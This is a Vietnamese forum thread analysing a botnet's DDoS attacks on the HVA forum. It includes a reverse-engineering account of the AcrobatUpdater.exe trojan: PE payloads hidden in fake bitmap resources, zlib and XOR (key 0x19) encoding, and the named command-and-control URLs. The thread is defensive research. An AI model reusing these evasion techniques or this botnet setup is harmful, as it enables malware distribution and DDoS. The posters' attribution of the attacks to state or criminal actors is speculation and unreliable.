Bách Khoa Antivirus đã diệt được con này chưa anh em? Theo nhận định của anh comale thì phần lớn xuất phát từ IP Việt Nam thì cái BKAV hàng Việt sao ko ưu tiên diệt triệt để mấy con trong nước loại này nhỉ? (à mà nghĩ lại. Cũng có thể chờ 1 thời gian khi HVA bị dập te tua lúc đó vụ này to lên [/b]báo chí[/b] lên tiếng để PR BKAV đã diệt được con này, mọi người nhớ mua key pro nghe ...) .Thay vì đăng những tin như thế này trong mục CNTT để phòng chống thì đua nhau đăng bài tablet, công nghệ cao và vô số cái từ dễ gây hiểu nhầm trong dấu nháy ' cực kì phản cảm. cho mình hỏi thêm: loại này nó lây nhiễm qua nguồn nào(và bằng cách nào, lỗ hổng bảo mật nào?) mà số lượng đông đảo vậy? (ví dụ chương trình giả mạo unikey, nhiễm trực tiếp qua website abc.com)

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

acoustics89 wrote:

STL sử dụng bot này tấn công theo hành vi duyệt web của người bình thường, thật là không đỡ được. Kĩ thuật sử dụng trong Bot này khá hay, hiện tại em chưa nghĩ ra cách gì để chống lại. Các bác admin có hướng nào để phòng trống không? Nó giả danh 1 người dùng nhé p/s: @phanledaivuong : Government nào thì không biết chứ Government của VN chắc chắn chả bao giờ làm thế. Như bản thân mình thì mình cũng không thích trang danlambaovn và chả bao giờ đọc.

Government China bạn ạ ^^.

TQN wrote:

File config mới của tụi STL này tại host direct.aliasx.net giờ đã xoá hết các host target ở cuối file, chỉ còn lại dòng trêu chọc này: Code:

Bọn STL này hình như hết việc để làm, việc anh conmale có là Postmodenism hay không thì không ảnh hưởng đến "diễn biến hoà bình" của việt nam, cũng không như làm cho Stalin sống lại đề xâm lược được 1 loạt các nước đông âu. LOL PS: Hiện tại em đang ra quán net choi DotA, vô getdota.com download cái map 7Mb thì 1 click chuột là xong mà vào hva bằng giao thức http thì không vào được, cuối cùng dùng https thì chậm như rùa bò, chắc vẫn bị DDoS.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

texudo wrote:

Đây là một việc cực kỳ nghiêm trọng, một mạng botnet khổng lồ được thiết lập ở Việt nam. Vậy mà chẳng cơ quan có thẩm quyền, báo chí nào lên tiếng cho bà con biết nhỉ. Thiệt là lạ quá, có chăng TQN & HVA team đang một mình chống lại thế lực với ảnh hưởng lớn, khống chế cả giới truyền thông chăng. Các ISP của Việt nam nữa, mình nghĩ là họ biết các thuê bao của họ đã bị nhiễm một loại malware dùng để tấn công DDOS, nhưng có vẻ họ không muốn lên tiếng.

Quả là chưa thấy có ISP nào ở VN lên tiếng nhưng thật ra đã có vài anh em HVA làm việc cho một vài ISP đã ngỏ ý muốn giúp điều tra, đặc biệt là anh em làm cho FPT. Phải nói rằng con bot của STL khá "smart" bởi vì nó áp dụng một số nguyên tắc cần thiết của HTTP để tạo độ tàn phá ở mức cao nhất đó là: - Thay đổi "User-Agent" - Sử dụng keep-alive - Lưu dụng cookie để bảo trì sessions. - Crawling (như crawlers) để tạo biến thiên cho các requests. Từ thời "vecebot" một số tính năng nhận chỉ thị từ xml có khả năng thay đổi "user-agent", áp dụng chiến thuật cho cookie và referer, con bot mới này dựa trên căn bản cũ và có những khả năng mới hơn và tàn phá nhiều hơn. Tuy vậy, chính giới hạn của HTTP và những ứng dụng thêm về session khiến cho sự tàn phá vẫn bị giới hạn ở góc độ kỹ thuật.

Phân tích tính chất vài trận DDoS HVA vừa qua.

KHUNG LONG — GMT

xnohat wrote:

Đã submit thêm lên Microsoft https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=61a88685-cf9e-46c6-9598-ba63aac7fefa&n=1 ------------------------------- Nếu có ý định lọt vào các máy chủ điều khiển thì thứ sẽ làm không phải là wwwect các luồng DDoS về "motherland" mà ra lệnh cho lũ bot down về một cái malware remover và một cái firewall dc remote control

Sáng nay, thử scan lại thì không diệt được vì bản cập nhật ngày 22/07/2011. :P Nên Manual cập nhật lên bản mới ngày 23/07/2011 thì kết quả là:

He He He vậy là Microsoft Security Essentials đã kill được con này rồi. Good Job. Thank you anh TQN nhiều và admin HVA. -Chình lại tháng cho đúng, thanks latlabao! :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

hanh_bk — GMT

Chào các bác, hôm rồi bên em cũng bị DDOS với cường độ khá mạnh, file tcpdump em đưa ra đây: http://www.mediafire.com/?r3mt1znr1tjhkmf File này em capture trong có vài chục giây đó. sau khi bị được 30' thì bên VDC báo là ngập toàn bộ mạng Core, bác nào hiểu cho em vài cái phân tích của vụ này với. Không biết sao dạo này các vụ botnet xảy ra nhiều thế không biết. Em post bài này ở đây nếu có gì không phải các mod/admin move hộ em đến chỗ nào mà phù hợp giúp em. Thanks các bác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao — GMT

KHUNG LONG wrote:

xnohat wrote:

Đã submit thêm lên Microsoft https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=61a88685-cf9e-46c6-9598-ba63aac7fefa&n=1 ------------------------------- Nếu có ý định lọt vào các máy chủ điều khiển thì thứ sẽ làm không phải là wwwect các luồng DDoS về "motherland" mà ra lệnh cho lũ bot down về một cái malware remover và một cái firewall dc remote control
Sáng nay, thử scan lại thì không diệt được vì bản cập nhật ngày 22/11/2011. :P Nên Manual cập nhật lên bản mới ngày 23/11/2011 thì kết quả là:

He He He vậy là Microsoft Security Essentials đã kill được con này rồi. Good Job. Thank you anh TQN nhiều và admin HVA.

Hôm nay mới 23 tháng 7 mà đã có bản cập nhật ngày 23/11 rồi à? Microsoft đúng là đi trước thời đại ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Em chỉ đứng theo phương diện một coder code ra 1 ct, em đã có thể khẳng định, chỉ có 1 STL duy nhất, gồm nhiều team. Mỗi team thì lung tung thành phần, trình độ. Team thì lo code bot, team thì lo code keylog, team thì lo gởi mail dụ victim, team thì lo up virus lên các site download, team thì lo đăng ký, bảo trì host phân phát "mèo què". Xuyên suốt đám "mèo què" của STL mà em thu thập được, em rút ra ý kiến này: các anh đã lạm dụng zlib quá, đâm ra nó chính là bằng chứng chỉ mặt các anh. Gần đây các anh còn chơi trò mạo danh bmp nữa chứ. Lúc đầu em hơi phân vân, em nghĩ có 2 nhánh cùng mang tên STL à. Tới giờ này, sau khi phân tích xong AcrobatUpdater.exe ra, em xin kết luận, các anh là một, cùng một cha mẹ cả, chỉ khác là cha mẹ đó có nhiều con thôi. Em nói đúng không mấy anh STL, mấy anh đừng chối nhé. Bằng chứng rành rành rồi đó. Zlib.lib và Zlib.dll chính là điểm chung của các anh, và đấy cũng là bằng chứng nhận dạng các anh. Vd nhỏ này nhé: File AcrobatUpdater.exe của các anh đã dùng tới 2 kỹ thuật mới: 1. Mạo danh Bmp Resource: Bitmap Resource với ID = 1 của các anh là bằng chứng. Mạo danh Bmp để qua mặt các AV, nhưng data của Bmp ResID 1 đó chỉ có cái BmpHeader là hợp lệ thôi, còn toàn bộ Bmp Lines Data thì các anh nhúng PE vào. Cái này sao giống Fake_Unikey vậy ha ? 2. File PE DLL nhúng trong Bmp ResID 1 extract ra là 1 dll, pack = UPX, upx -d thì lòi ra nó chính là zlib.dll, ver 1.1.4.0. Các anh sợ extract nó ra System32 đụng zlib.dll nào đó đang run nên các anh đổi tên nó thành jarlib.dll à ? 3. Một loạt các "mèo què" của các anh, từ Nguyễn Văn Lý, Tin Lành, Fake_Unikey, vecebot, daoxx.. các anh đều dùng zlib api và buid với zlib static library, gần như 100%. Signature chình ình ra đó, các anh search thử string "zlib" trong mấy file "mèo què" mấy anh đã build là thấy. Chỉ có AcrobatUpdater.exe này, VB không dùng static lib của C/C++ được nên các anh phải nhúng Zlib dll vào và extract ra, LoadLibrary, GetProcAddress để call. Dựa trên signature này + zlib signature em tự build + PatchDiff2 plugin, em đã vạch mặt, chỉ danh các anh rồi. Tiết lộ vớ mấy anh STL; em code VB từ hồi năm 1995 lận, từ hồi VB 1 với sách của Peter Norton lận. Sách Hardcore VB của MS Express, tác giả là thằng cầu thủ gì đó của MS thì em đọc nát rồi. Em nói đúng không các anh STL, em nói vầy các anh tâm phục khẩu phục chưa ? Các anh có code "mèo què" tới cỡ nào em cũng biết được thằng nào trong team của các anh code. Các anh nghỉ dân VN này dốt lắm à, dể để các anh xỏ mũi lắm à ? Đi đâu cũng về La mã, khi xưa BKAV đạo code dùng Rar.exe để nén data gởi lên, bây giờ các anh dùng zlib để unzip data nhận về. Sao trùng hợp vậy ha ? Kỹ thuật mới mà các anh dùng để qua mặt các AV là thay vì chơi nguyên xi PE file vào resource, các anh dùng các xZip để nén các file PE lại, dùng các tool bin2db để convert toàn bộ file zip đó ra hex string, rồi mang toàn bộ hex string array đó vào ct, nhúng ở .data hay .rdata section. Khi run, các anh extract đống datađ ó ra %Temp% file, dùng Zlib function để uncompress nó rồi run file PE đó. Điển hình: DrWatson.exe của mấy anh, đúng không mấy anh STL ? Kỹ thuật này cũng hiệu quả đấy chứ, ít được dùng và ít phổ biến trong giới "mèo què" quờ rai tờ, qua mặt được các AV ;) Em đùa tí nhé cho bớt "sờ trít": Nếu các anh chường mặt rao bán các "mèo què", bot của các anh, em sẽ vạch mặt các anh đạo code, vi phạm bản quyền liền. Em nói mấy anh STL đừng tức nhé, em biết trong team các anh có các bác bằng tuổi ba em, như bác Xxxx gì đó. Nhưng tức thì chịu chứ sao bây giờ, mấy anh làm bậy, làm bẩn mà !!!??? Bitmap gì mà tự dưng không không nhúng vô vầy nè, chả có hình thù gì cả

Mang vào 010Editor với BmpTemplate thử xem:

À, chơi nhúng PE với BmpInfo Header mạo danh à, extract ra thử xem:

UPX à, quá dễ, upx -d xem sao. OK, không phải UPX modified, unpack ngon lành. Xem version info của nó xem sao:

Ặc ặc, lại Zlib nữa, nhưng không sao, thằng này chơi DLL nên dể RCE, nó chỉ dùng 3 hàm của zlib: gzopen, gzunxxx gì nữa vậy bà con RCE ? Nói ra anh em STL buồn, tự dưng tới giờ em thấy việc RCE "mèo què" của mấy anh là thú vui, là giải trí cho em trong lúc kinh tế khó khăn, ít việc lúc này. Và cũng để em luyện nâng cao tay nghề RCE. Có lúc em thấy khả năng RCE em còn kém quá, "nữa mùa" quá, RCE không kịp, không được 100% các mẩu "mèo què" của mấy anh được liên tục sản xuất ra !!! ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

TrojanDownloader:Win32/VB.SK Encyclopedia entry Published: Jul 22, 2011 Aliases Not available Alert Level (?) Severe Antimalware protection details Microsoft recommends that you download the latest definitions to get protected. Detection initially created: Definition: 1.109.171.0 Released: Jul 22, 2011

Bạn KHUNG LONG nhầm một chút thôi mà bạn latlabao. Em đây nhiều lúc còn quên tên tháng trong tiếng Anh mà, giờ mà ai bắt em đọc từ tháng 1-12 bằng tiếng Anh là em thua (nhưng em biế July = 7 mà). Mang trả hết cho thầy cô rồi (tội nghiệp mấy thầy cô có thằng học trò như em) ! Tình cờ em đọc được bài này, mời bà con đọc thử và suy nghĩ: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Mới kiểm tra lại stats của hệ thống thì thấy từ 5 giờ chiều hôm qua đến 5 giờ chiều hôm nay (giờ VN) có 81 triệu cú SYN có dung lượng 4.5Gb đập vào hệ thống và bị /dev/null. Ngoài ra, có khoảng 53 triệu full requests ở dạng DDoS đến HVA có dung lượng 55Gb (mỗi full request có kích thước khoảng 1124 bytes bao gồm SYN, ACK và ACK PSH + HTTP data load). Hệ thống giảm DDoS từ khoảng 9 giờ tối giờ VN và giảm dần cho đến ngày hôm nay.

Phân tích tính chất vài trận DDoS HVA vừa qua.

piloveyou — GMT

Sao lại chỉ có có bác TQN & conmale một mình một chuột chống đỡ vậy chứ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

tanviet12 — GMT

Không biết mấy anh chị bên VNCERT vào cuộc chưa. Chưa thấy động tĩnh gì hết

Phân tích tính chất vài trận DDoS HVA vừa qua.

mechk — GMT

TQN wrote:

Tình cờ em đọc được bài này, mời bà con đọc thử và suy nghĩ: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1

Sau khi đọc xong thì em thấy kết nhất là cái ảnh ở đầu bài viết :-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

piloveyou wrote:

Sao lại chỉ có có bác TQN & conmale một mình một chuột chống đỡ vậy chứ?

2 bác ấy không đơn độc đâu, còn có Scrutiny System của em nữa ;))

Phân tích tính chất vài trận DDoS HVA vừa qua.

LlyKil — GMT

Chào mọi người, Tính chất cũng như kĩ thuật tấn công đã được nêu rõ, hy vọng biện pháp phòng thủ sẽ là chủ đề kế tiếp thay vì cứ bàn những vấn đề rời rạc khác. Đó mới là mục đích chính và cũng là phần thú vị (nếu RCE thì có thể "up" cái topic của bạn TQN lên tránh lạc đề :P).

Phân tích tính chất vài trận DDoS HVA vừa qua.

nobitapm — GMT

E đã submit cái file AcrobatUpdater.exe, size=282624 bytes mà anh TQN post lên cho Symantec hôm 22/07/2011 đến hôm nay 24/07/2011 thì nhận được câu trả lời là file đó không nguy hiểm, và cái thằng Norton Internet Security 2011 của em hôm nay quét cũng không diệt được cái file AcrobatUpdater.exe :(. Nguyên văn trả lời của Symantec như sau :

This message is an automatically generated reply -- do not reply to this message. This system is designed to analyze and process suspicious file submissions into Symantec Security Response and cannot accept correspondence or inquiries. --------------------------------------------------------------------------- Submission Summary --------------------------------------------------------------------------- We have processed your submission (Tracking #20779850) and your submission is now closed. The following is a report of our findings for the files in your submission: File: AcrobatUpdater.exe Machine: Machine Determination: Please see the developer notes. --------------------------------------------------------------------------- Customer Notes --------------------------------------------------------------------------- This file control bonet systemn for DDOS --------------------------------------------------------------------------- Developer Notes --------------------------------------------------------------------------- AcrobatUpdater.exe Our automation was unable to identify any malicious content in this submission. The file will be stored for further human analysis --------------------------------------------------------------------------- This message was generated by Symantec Security Response automation. Should you have any questions about your submission, please contact our regional technical support from the Symantec Web site, and give them the tracking number included in this message. Symantec Technical Support

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

piloveyou wrote:

Sao lại chỉ có có bác TQN & conmale một mình một chuột chống đỡ vậy chứ?

1- Đâu chỉ có TQN và conmale, còn cả tôi -PXMMRF- nữa mà. Tôi cũng đã viết một số bài đấy chứ. Hì hì. Liên quan đấn STL, không chỉ có topic này mà còn những topic khác năm rải rác ở các box khác trong forum: "RCE", "Những thảo luận khác".... Ngoài ra đứng sau các HVA Admin. còn có khá nhiều Mod. và member khác. Secmac vừa qua chẳng viết một bài khá hay là gì. Có điều là TQN đã viết ra quá nhiều thông tin rất có giá trị. Chúng tôi cũng phải có thời gian để nghiền ngẫm nôi dung, mới viết bổ sung được. Vả lai cũng quá bận công viêc mưu sinh, nuôi con ăn học... nên nhiều khi phải tranh thủ thời gian. Có đêm phải thức đến 1-2 h nghiền ngẫm, khai triển những phát hiện của TQN. Tôi cũng vừa phải đi công tác Hà nôi tới hơn 1 tuần.

TQN wrote:

Tình cờ em đọc được bài này, mời bà con đọc thử và suy nghĩ: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1

2- Xác đinh nhân thân của STL là một việc tốn nhiều thời gian, công sức, phải qua nhiều năm. Không thể từ một sự kiện (event) mà tìm ra được. Những dự đoán của TQN là đúng. Sự xác định của bạn "phanledaivuong" liên quan đến STL, ở một post phía trên, cũng là đúng. Thưc ra tôi đã theo dõi các hiện tượng khá lạ (sau này chúng dường như mang tên STL) từ khi domains: pavietnam.net và pavietnam.com bị chiếm đoat quyền sử dung. Gọi là lạ, vì tôi thấy đây là một hành đông lấy cắp domain tinh vi, chuyên nghiệp, có liên quan đến một tổ chức mafia IT có trình độ cao của Nga (Russian). Có dịp tôi sẽ nói thêm về tổ chức tội phạm này. Hiện tại có những bằng chứng rõ ràng là STL vẫn còn liên quan đến tổ chức tôi phạm nói trên. Đây là một tổ chức hoạt đông rất rộng trên mạng, nhưng nó lai không có một website-server chính thức nào để có cơ sở truy tìm dấu vết. Nếu các bạn đọc kỹ các bài viết của tôi về STL (bên ngoài và trong box BQT HVA), sẽ thấy từ khá lâu tôi đã xác định chúng là ai, do ai chỉ đạo, trả tiền....Và điều này ngày càng rõ. Rõ ràng là mọi việc đều cần thời gian dài để mọi người thấy rõ. Các bạn có thể tham khảo các comment của tôi (PXMMRF-HVA và PHAM XUAN MAI) về vấn đề liên quan tại bài viết trên McAfee blog: "Vietnamese Speakers Targeted In Cyberattack" http://blogs.mcafee.com/corporate/cto/vietnamese-speakers-targeted-in-cyberattack Khi đó tôi đã xác định tác giả của W32/VulcanBot là Chinese hacker, mà cụ thể là là STL 3- Tôi đồng ý với một số nhận định trong bài viết của bạn "CHIẾN SĨ AN NINH" tại: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1 Quả thưc lưc lượng AN NINH thì làm việc vất vả, luôn phải đối phó với hiểm nguy, khá trong sạch, vì ít có cơ hôi tham nhũng. Nhưng tất nhiên cũng không phải không có một vài cá nhân, trường hợp không hay. Các trường hơp này tuy ít về số lượng, nhưng nếu có thì quy mô và tác hại lại rất lớn. Cũng có trường hợp có người giải quyết vấn đề một cách manh đông, thiếu suy nghĩ chín chắn. Tuy nhiên điều nay cơ bản là tôi đồng ý với ý kiến của bạn "CHIẾN SĨ AN NINH". Nhưng điều tôi không đồng ý là: thưc ra theo tôi "Không có bất cứ một thoả thuận nào giữa TQ và VN về hỗ trợ lẫn nhau trong an ninh và bảo vệ mạng truyền thông quốc gia". Có nhiều lý do, trong đó có lý do này. Trước các năm 80, Internet chưa có tại TQ và Việt nam. Chẳng ai lai đi bàn và ký kết các hiệp đinh liên quan đến mạng truyền thông. Sau các năm 80 thì hậu quả của các trận chiến TQ xâm lược VN năm 1979, trận chiến Trường sa 1988... rất nặng nề. Hai bên có nhiều bất đồng, chỉ "bằng mặt mà không bằng lòng", luôn luôn dò xét và canh chừng lẫn nhau. Một hiệp định quan trọng về thông tin, bảo mật như vậy rất khó được đề cập. Tôi có hỏi một vài người bạn cùng học phổ thông, nay đang đảm nhân một vài chức vụ nào đó ở lưc lương ưu tú nhất của lưc lượng AN NINH, về sự hiện diện nếu có về một hiệp định như vậy. Câu trả lời của họ là "Không-Dứt khoát là Không" 4- Về mặt Trojan, Bot thì trong một quá trình lịch sử dài STL sử dụng nhiều loai Trojan khác nhau để lấy cắp thông tin và tấn công DDoS trên mạng: từ W32/VulcaBot (vào khoảng các tháng đầu năm 2010), đến VeceBot (vào khoảng các tháng cuối năm 2010) và loại Trojan hiện nay mà anh TQN đang phân tích một cách rõ ràng và khá hay, tạm gọi là "STLBot". Các Trojan này đều có những điểm khá giống nhau và đươc cải tiến dần từ một số nguồn. Nguồn đầu tiên có lẽ là đươc viết ra từ các hacker Nga, trong tổ chức Mafia IT Nga tôi nói ở trên. Điểm giống nhau là chúng đều được "nhúng" (embedded) vào các phần mềm hay tool thông dung mà rất nhiều, hay hầu hết người Việt nam thường dùng hay phải dùng: thí dụ VPSKeys hay Vietkey2000-2002 (trường hơp W32/VulcaBot), Vietkey2007, Unikey4.x...(trường hơp Vecebot hay các STL bot sau này). Các phần mềm, tool này được đưa lên một số website VN để tiện download, trong đó có cả website đặt TQ, hoặc STL thâm nhập vào website VN (từ việc lấy cắp mật mã truy cập website) và nhúng trojan vào. Vì vậy số máy VN và nước ngoài (của bà con Việt kiều) bị nhiễm "STLBot" rất lớn Các trojan trong các máy bị nhiễm mã đôc thường xuyên, tự động liên hệ với một số website để update thông tin, cấu trúc và địa chỉ tấn công DDoS... STL sử dụng rất nhiều website loai này (tạm gọi là Master websites) và đặt ở rất nhiều nơi trên TG: Mỹ, Anh, Pháp, TQ, Việt nam..... Master website có khi chỉ là một website hosting ở webserver của một công ty dịch vụ web nào đó, có thể đặt trên một webserver riêng do chính STL quản lý (bỏ tiền ra mua, thuê), có thể là các webserver lưu động sử dụng hệ thống tên miền năng động (dynamic domain system) chạy wifi miễn phí.... STL đã tốn rất nhiều thời gian, công sức, tiền bạc (sự tốn kém đến mức kinh ngạc nếu ta thử tính toán, cộng lại các khoản chi phí) để làm việc phát tán virus, lấy cắp password email, quản lý website, blog, tấn công DDoS trên mạng, deface nhiều website... Ai tổ chức và chi tiền cho việc này. Điều này nay đã khá rõ 5- Để chống lại các cuộc tấn công DDoS trên mạng một cách hữu hiệu, điều quan trong nhất và biện pháp duy nhất trong tình hình hiện nay, theo tôi, là phải tìm mọi cách phát hiện ra các Master website chỉ huy, điều khiển mạng bot và nhanh chóng vô hiệu chúng với mọi phương tiện có thể, cần thiết. Điều trớ trêu là việc tìm ra các Master websites thưc ra lại không khó khăn gì. Chỉ cần người sử dụng máy tính (bị nhiễm bot và trở thành một zombie) biết được đia chỉ kết nối mà bot liên hệ đến, thông qua một chương trình kiểm soát thường xuyên các kết nối từ máy mình với mạng Internet, là xong. Trong khi trên mang có tới hàng trăm ngàn máy tính, hay nhiều hơn, đang bị nhiễm bot và trở thành các zombies

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đây là 1 phần đoạn mail của bạn trẻ cao thủ gởi cho tui. Post lên đây để anh em đọc cho vui:

Về vấn đề mẫu, thì phải xuất phát từ GoogleCrashHandle ạ. Em có mẫu ấy từ bạn xxx trên xxx, cái này chắc anh đã biết. Sau khi nghiên cứu, em viết tracker cho nó, thì tải được 1 file cũng code bằng VB sau đó không lâu, tên là Jucheck.exe. Mẫu này em có từ cái hồi xxx cơ mà. Y hệt cái AcrobatUpdater luôn, chỉ có Icon là của bạn Java Update. Chính nó tấn công vietnamnet. Mẫu này luôn truy cập để tải về file tại địa chỉ http://penop.net/top.jpg đọc code thì thấy nó giải mã với thuật toán xor theo byte, key là 0x19. nhưng ngặt nỗi hồi đó không tải được, link chết. Hệ thống botnet tracker của em thì chạy liên tục, lúc nào cũng định kì download các link, có mẫu mới là notify luôn. tơi đúng hôm HVA bị dos thì có hàng mới của top.jpg , về giải mã ra thì được cái link http://penop.net/images01.gif , đó chính là mẫu virus viết bằng VB hiện giờ đang hoành hành, cũng xor 0x19 theo byte. khi chạy , tên nó là AcrobatUpdater. Hôm đó thấy file cấu hình của nó, em đã định bảo anh ngay nhưng lại không vào HVA được Tất cả các mẫu botnet em có được, em đều đưa vào tracker của em hết, nhiều mẫu nó phải lâu lắm rồi, tưởng chết rồi, thế mà 1 ngày đẹp trời là nó sống lại và có hàng Khoe với anh: cái tracker này em viết cũng lâu rồi, nhưng chỉ để cho vui thôi ạ, nếu không em cũng chả có mẫu mới :| Đó là nguồn mẫu duy nhất của em đấy. Còn tình cờ gặp mấy cái như fake Unikey, cái đấy ăn may. đưa vào tracker mấy hôm thì thấy link die :|

Bạn trẻ này đóng vai trò quan trọng nhất trong việc dò tìm và phân tích đám malwares của STL. Tui chỉ là người phát ngôn của Bộ dò tìm STL thôi. "Tui kịch liệt lên án STL" (Giống như cô Phương Nga thôi) ;) 2 anh PXMMRF: Tại sao bây giờ VNCERT, BKAV, CMC, báo chí... vẫn im ru bà rù vậy ha ???? Chuyện gì đang xảy ra sau lưng hậu trường ????

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

Đây là 1 phần đoạn mail của bạn trẻ cao thủ gởi cho tui. Post lên đây để anh em đọc cho vui:
Về vấn đề mẫu, thì phải xuất phát từ GoogleCrashHandle ạ. Em có mẫu ấy từ bạn xxx trên xxx, cái này chắc anh đã biết. Sau khi nghiên cứu, em viết tracker cho nó, thì tải được 1 file cũng code bằng VB sau đó không lâu, tên là Jucheck.exe. Mẫu này em có từ cái hồi xxx cơ mà. Y hệt cái AcrobatUpdater luôn, chỉ có Icon là của bạn Java Update. Chính nó tấn công vietnamnet. Mẫu này luôn truy cập để tải về file tại địa chỉ http://penop.net/top.jpg đọc code thì thấy nó giải mã với thuật toán xor theo byte, key là 0x19. nhưng ngặt nỗi hồi đó không tải được, link chết. Hệ thống botnet tracker của em thì chạy liên tục, lúc nào cũng định kì download các link, có mẫu mới là notify luôn. tơi đúng hôm HVA bị dos thì có hàng mới của top.jpg , về giải mã ra thì được cái link http://penop.net/images01.gif , đó chính là mẫu virus viết bằng VB hiện giờ đang hoành hành, cũng xor 0x19 theo byte. khi chạy , tên nó là AcrobatUpdater. Hôm đó thấy file cấu hình của nó, em đã định bảo anh ngay nhưng lại không vào HVA được Tất cả các mẫu botnet em có được, em đều đưa vào tracker của em hết, nhiều mẫu nó phải lâu lắm rồi, tưởng chết rồi, thế mà 1 ngày đẹp trời là nó sống lại và có hàng Khoe với anh: cái tracker này em viết cũng lâu rồi, nhưng chỉ để cho vui thôi ạ, nếu không em cũng chả có mẫu mới :| Đó là nguồn mẫu duy nhất của em đấy. Còn tình cờ gặp mấy cái như fake Unikey, cái đấy ăn may. đưa vào tracker mấy hôm thì thấy link die :|
Bạn trẻ này đóng vai trò quan trọng nhất trong việc dò tìm và phân tích đám malwares của STL. Tui chỉ là người phát ngôn của Bộ dò tìm STL thôi. "Tui kịch liệt lên án STL" ;) 2 anh PXMMRF: Tại sao bây giờ VNCERT, BKAV, CMC, báo chí... vẫn im ru bà rù ????

Như tôi đã viết, STL dự phòng rất nhiều master websites và đặt ở nhiều nơi trên thế giới. Có thể dễ dàng thay thế các master mới khi những cái cũ bị phát hiện. Như vừa rồi khi thấy TQN phát hiện ra các master website http://penop.net/ hay http://direct.aliasx.net, thì STL lập tưc inactive (vô hiệu hoá ) chúng. Khi tôi biết thông tin của TQN, tôi check thẳng vào chúng, không cần quan ngại gì, thì website này đã inactive mất rôi. Đương nhiên các file .jpg hay btm đặt tai webroot không thể tìm thấy. Tuy nhiên scenario (kịch bản) cụ thể sẽ như sau: - STL đọc thông tin phát hiện của TQN về các master website (Không ít thành viên STL đang chăm chú đọc các bài viết của TQN, kể cả bài tôi đang viết nữa .Hì hì) - STL không inactive ngay các master website, mà duy trì chúng trong một thời gian nào đó, ngắn nhưng đủ dài để các bot update các thông tin mới về muc tiêu DDoS mới cũng như đia chỉ mới của master website (đia chỉ cũ đã lộ thì STL sẽ bỏ đi) - Do các bot tại hàng trăm ngàn zombies thường xuyên, tự động liên hệ với master website (cũ) và các kết nối ấy là persistent connection (keep-alive) nên chỉ trong một thời gian ngắn, có thể tối đa là 60 sec (với IE 6-7-8) hay 115 sec (với FireFox4-5) hay hơn một chút là trình duyệt của máy zombies đã giúp bot update được các thông tin mới về Master websites (tên miền, IP address). Muc tiêu tấn công DDoS có thể STL không cần thay đổi, như trường hợp HVA vừa rồi. - Sau đó thì STL mới chính thức thay đổi Master website Ta hình dung có một cuộc chay đua giữa HVA (TQN-conmale) và STL trong chuyện này. TQN phát hiện master website, STL thay đổi master website, TQN lai phát hiện...vv. Nhưng tôi tin rằng lão conmale tuy già cả nhưng thường vẫn chạy nhanh hơn. Hì hì ------------ VNCERT: Biên chế ít, nên chỉ có thể quản lý mạng theo kiểu hành chính thôi BKAV: Đang tập trung vào diệt virus nên có thể không tập trung vào RCE kỹ lưỡng và với mục đích như TQN. Vả lại theo tôi họ không giỏi RCE như TQN. CMC: do bác Triệu trần Đức, Admin cũ của HVA, là TGD. Họ đang rất quan tâm đến các bài viết về Trojan của STL và đang viết các DAT file diệt các Trojan này. Nói chung, theo tôi họ rất tán đồng và ủng hộ HVA Báo chí: Đến ta (HVA) mà phải tốn nhiều thời gian, công sức và phải có kiến thức sâu về RCE thì mới discover được đám Bot của STL, thì cánh báo chí sao làm được, biết được. Nhưng chắc họ cũng phải còn nghe ngóng, tìm hiểu thông tin thêm chứ, rồi mới viết bài. Cũng còn một đôi vấn đề chính chúng ta (HVA) cũng còn chưa hoàn toàn thống nhất cơ mà.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tanviet12 — GMT

Hì. HVA ta cũng có mấy huynh bên VNCERT nữa mà. Hy vọng các anh sẽ can thiệp sớm ..

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Chết là chết trong thời gian ngắn đó đấy anh PXM. Tụi nó sẽ cập nhật bot mới lập tức, setup URL download mới lập tức, hy sinh AcrobatUpdater và các URL cũ. Mình sẽ vẫn bị đánh tiếp. File config mới xc.jpg đã không ra lệnh tắt DDOS vào HVA, mà chỉ thay = dòng trêu chọc đó. Một lượng Bot lớn còn lại vẫn theo config cũ mà dập vào HVA ta. Đúng là nhức đầu. Giờ ta có dập được cái host direct.aliasx.net thì vẫn bị DDOS, chỉ còn nước tận diệt các bot còn tồn tại và nhanh chóng tìm ra bot mới. Nếu ISP can thiệp, tui nghĩ họ nên firewall 2 host penop.net và direct.aliasx.net. Bà con nào phát hiện AcrobatUpdater.exe mình và biết cách dùng Wireshark, CommView, TCPView hay SmartSniff (của Nirosoft) có thể giúp mọi người bằng cách: đừng xoá AcrobatUpdater.exe theo dõi thử AcrobatUpdater.exe connect tới host nào, URL ra sao, UserAgent như thế nào ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

LlyKil wrote:

Chào mọi người, Tính chất cũng như kĩ thuật tấn công đã được nêu rõ, hy vọng biện pháp phòng thủ sẽ là chủ đề kế tiếp thay vì cứ bàn những vấn đề rời rạc khác. Đó mới là mục đích chính và cũng là phần thú vị (nếu RCE thì có thể "up" cái topic của bạn TQN lên tránh lạc đề :P).

